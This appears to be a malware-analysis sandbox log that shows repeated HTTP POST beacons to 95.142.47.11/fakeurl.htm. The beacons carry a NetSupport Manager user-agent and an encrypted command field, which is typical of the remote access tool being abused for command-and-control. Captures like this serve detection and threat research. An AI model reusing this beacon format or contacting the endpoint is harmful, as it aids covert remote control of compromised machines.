                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:16.191735029 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:16.292036057 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:16.392923117 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:16.493963957 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:16.593884945 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:16.700732946 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:16.804141045 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:16.904896021 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:17.005752087 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:17.105741978 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:17.205960035 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:17.306703091 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:17.406687021 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:17.507968903 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:17.607980967 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:17.711205006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:17.810784101 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:17.910692930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:18.010708094 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:18.111711979 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:18.211751938 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:18.312694073 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:18.412703037 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:18.512682915 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:18.612734079 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:18.713701010 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:18.813683033 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:18.914675951 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:19.015816927 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:19.116821051 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:19.216670990 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:19.316735029 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:19.417819023 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:19.518687010 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:19.618788004 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:19.719696045 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:19.819905996 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:19.920670986 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:20.020694017 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:20.120855093 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:20.221690893 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:20.321865082 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:20.421902895 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:20.522680044 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:20.622726917 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:20.723705053 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:20.823728085 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:20.924351931 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:21.024663925 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:21.125763893 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:21.225796938 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:21.326709032 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:21.426779032 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:21.527096033 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:21.626857042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:21.728362083 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:21.827750921 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:21.929430962 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:22.029933929 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:22.130855083 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:22.230787039 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:22.331168890 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:22.431315899 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:22.531819105 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:22.632363081 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:22.731770039 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:22.831931114 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:22.931962013 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:23.032943964 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:23.132740021 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:23.232933044 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
